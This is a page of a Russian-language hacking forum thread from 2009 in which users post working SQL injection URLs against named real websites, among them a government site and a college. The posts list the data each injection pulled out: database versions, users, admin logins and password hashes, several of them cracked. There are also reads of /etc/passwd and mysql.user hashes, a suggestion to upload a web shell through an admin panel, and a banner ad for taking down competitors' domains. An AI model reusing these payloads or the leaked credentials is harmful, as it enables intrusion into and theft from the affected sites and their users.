Форум АНТИЧАТ - SQL Инъекции

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz

		Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
SQL Инъекции

Страница 843 из 1242

843

Опции темы

Поиск в этой теме

Опции просмотра

#8421

17.03.2009, 22:01

Rubaka

Участник форума

Регистрация: 02.09.2007

Сообщений: 292

Провел на форуме:
3659973

Репутация: 466

Отправить сообщение для Rubaka с помощью ICQ

http://globalfsconsulting.info/display.php?page=-105+union+select+1,2,3,4,5,6,7,8,9,0/*

Database Version: 4.1.22-log
Database name: gfsc_db
User name: gfsc_dbman@localhost

#8422

17.03.2009, 22:11

spherics

Участник форума

Регистрация: 14.01.2008

Сообщений: 174

Провел на форуме:
800953

Репутация: 443

Цитата:

http://www.wpc.gov.lk/wpc-planning/memberdetails.php?RID=54623875603+union+select+1,A ES_DECRYPT(AES_ENCRYPT(CONCAT(0x3a,Version(),0x3a, Database(),0x3a,User(),0x3a),0x71),0x71),3,4,5,6,7 ,8,9,10--

Database Version: 5.0.4-beta-nt
Database name: dbwpcplanning
User name: root@localhost

Цитата:

http://www.wpc.gov.lk/wpc-planning/memberdetails.php?RID=54623875603+union+select+1,A ES_DECRYPT(AES_ENCRYPT(CONCAT(0x3a,password,0x3a,U ser,0x3a),0x71),0x71),3,4,5,6,7,8,9,10+from+mysql. user--

*35A07C27A4C9E7065E275041F949FE07D5347D48 : root

#8423

17.03.2009, 22:25

~~farex~~

Banned

Регистрация: 11.03.2009

Сообщений: 214

Провел на форуме:
914766

Репутация: 317

Код:

http://ombu.primorsky.ru/articles.php?id=-224+union+select+1,2,concat_ws(0x3a,version(),database(),users()),4,5,6,7--

database : 4.1.22-log
name_database : ombu
user

mbu@localhost

#8424

17.03.2009, 22:34

spherics

Участник форума

Регистрация: 14.01.2008

Сообщений: 174

Провел на форуме:
800953

Репутация: 443

ASP + MYSQL

Цитата:

http://www.elcaandy.org/archivearticle.asp?id=28098097544+union+select+1,2 ,concat_ws(0x3a,version(),user(),database()),4,5,6 ,7,8,9--

Version: 4.0.24-nt-max
User: internetadmin@DEDI408
Database: standrew

#8425

17.03.2009, 22:48

.:[melkiy]:.

Постоянный

Регистрация: 25.01.2009

Сообщений: 368

Провел на форуме:
5290740

Репутация: 912

Цитата:

http://www.chefgarvin.com/home.php?module=news&id=-1+union+select+1,concat_ws(0x3a,password,username) ,3,4,5+from+users--

Version: 5.0.67-log
User: chefgarvin@coke.dreamhost.com
Database: chefgarvin

Админка:

Цитата:

http://www.chefgarvin.com/admin/

#8426

17.03.2009, 23:00

spherics

Участник форума

Регистрация: 14.01.2008

Сообщений: 174

Провел на форуме:
800953

Репутация: 443

Перчики дизайнерские -)

Цитата:

http://www.plethoradesign.com/portfolio/view.php?id=37987987986454435/**/uNiOn/**/sElECt/**/1,concat_ws(0x3a,version(),user(),database()),3,4, 5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21--

Database Version: 5.0.67-community
Database name: plethora_projects
User name: plethora_work@localhost

#8427

17.03.2009, 23:52

Gorev

Познавший АНТИЧАТ

Регистрация: 31.03.2006

Сообщений: 1,167

Провел на форуме:
4072944

Репутация: 1550

Отправить сообщение для Gorev с помощью ICQ

Отправить сообщение для Gorev с помощью Yahoo

http://www.contabilul.ro/index.php?pag=a&id=&s=&aid=-2317+union+select+1,2,3,4,5,concat_ws(0x3a,version (),database(),user()),7,8,9,10/*

Database Version: 5.0.26
Database name: contabilul
User name: root@localhost

http://www.contabilul.ro/index.php?pag=a&id=&s=&aid=-2317+union+select+1,2,3,4,5,load_file('/etc/passwd'),7,8,9,10/*

#8428

18.03.2009, 00:22

hackmen

Участник форума

Регистрация: 22.10.2007

Сообщений: 119

Провел на форуме:
598447

Репутация: 123

PR 5
http://www.wccs.edu/

http://www.wccs.edu/news/article.php?nid=-169+union+select+1,2,concat_ws(0x3a,user,Password) ,4,5,6,7,8+from+mysql.user--
root:*5AA32F1068AC50393758B94305EBA8978DFE3448

#8429

18.03.2009, 00:23

.:[melkiy]:.

Постоянный

Регистрация: 25.01.2009

Сообщений: 368

Провел на форуме:
5290740

Репутация: 912

Цитата:

http://www.audio-architects.net/news.php?module=news&id=-1+union+select+1,2--

Database Version: 4.1.20
Database name: audioarc
User name: audioarc@localhost

Цитата:

http://www.cpspei.ca/news?page=news&id=-1+union+select+1,2,unhex(hex(version())),4,5--

Database Version: 4.1.14-standard
Database name: cpspei_ca_-_cofp
User name: cpspei@localhost

Цитата:

http://nkc-inter.com/?v=news&id=-1+union+select+1,2,3,4,5,6--

Database Version: 4.1.22-standard-log
Database name: nkcinter_sitemagixprod
User name: nkcinter_nkcluye@localhost

Цитата:

http://www.locksafe.com.au/pages.php?action=news&id=-1+union+select+1,2,3,4,5,6,7,8--

Database Version: 4.1.22-log
Database name: locksafe
User name: locksafe@mysql.web.westnet.com.au

Цитата:

http://www.lared.com.gt/detalle_noticia.php?id=-3019+union+select+1,2,3,4,5--

Database Version: 4.1.25-Debian_mt1-log
Database name: db7589_rcn
User name: estudiodinamo@10.1.129.13

Цитата:

http://www.avancso.org.gt/index_noticias.php?id=-269+union+select+1,2,3,4,5,6,7,8,9,10--

Database Version: 4.0.26
Database name: avancso_org_gt
User name: avancso@localhost

----------------------------------------------------------------------------------------------------

Цитата:

http://www.yazdtile.com/user/news.php?action=news&id=-1+union+select+1,2,3,4--

Database Version: 5.0.67-community
Database name: yazdtile_tile
User name: yazdtile_mahtab@localhost

Login: admin
Pass: e10adc3949ba59abbe56e057f20f883e: 123456

Цитата:

http://www.shf.be/index.php?page=news&id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14--

Database Version: 4.1.20-log
[B]Database name: shf_public
User name: root@localhost

Login: root
Pass: 055990f63dab6a1b: ??

FILE_PRIV: Y

Цитата:

http://www.duatv.net/?req=news&id=-1+union+select+1,2,3--

Database Version: 5.0.67-community
[B]Database name: duatv_duatv
User name: duatv_ntduatv@localhost

Login: admin
Pass: 21232f297a57a5a743894a0e4a801fc3: admin

Последний раз редактировалось .:[melkiy]:.; 18.03.2009 в 00:27..

#8430

18.03.2009, 13:01

-=Static=-

Участник форума

Регистрация: 12.11.2006

Сообщений: 213

Провел на форуме:
347573

Репутация: 185

ТИЦ: 50
PR: 3

database(): germes_site
user(): germes_site@localhost
version(): 5.0.75

TARGET: http://www.germesavto.com

INJECTION:

Цитата:

http://www.germesavto.com/new.php?id=-3+UnIon+Select+1,2,concat_ws(0x2e,table_schema,tab le_name),4+from+information_schema.tables+limit+17 ,1--

Админка: http://www.germesavto.com/login.php

Структура БД:

germes_site
-admins (2)
--login
--pwd
-files
-news
-ourcli
-strings
-strings2
-strings3
-texts

В табице admins 1 единственная запись:
admin:e101b2fe8c5dab5ca568675de0d2cb39 // ???

Хэш ХЗ. Кому интересно можно до конца добить)) Наверняка можно из админки залить шелл и вперед))

Последний раз редактировалось -=Static=-; 18.03.2009 в 13:04..

Страница 843 из 1242

843

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая	k00p3r	Чужие Статьи	0	13.06.2005 11:26
SQL инъекция и Oracle, часть 2	k00p3r	Чужие Статьи	0	13.06.2005 11:24
Sql инъекция и Oracle, часть первая	k00p3r	Чужие Статьи	0	13.06.2005 11:23
Внедрение Sql кода с завязанными глазами	k00p3r	Чужие Статьи	0	12.06.2005 20:48
SQL Injection в Oracle	k00p3r	Чужие Статьи	0	12.06.2005 12:41

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход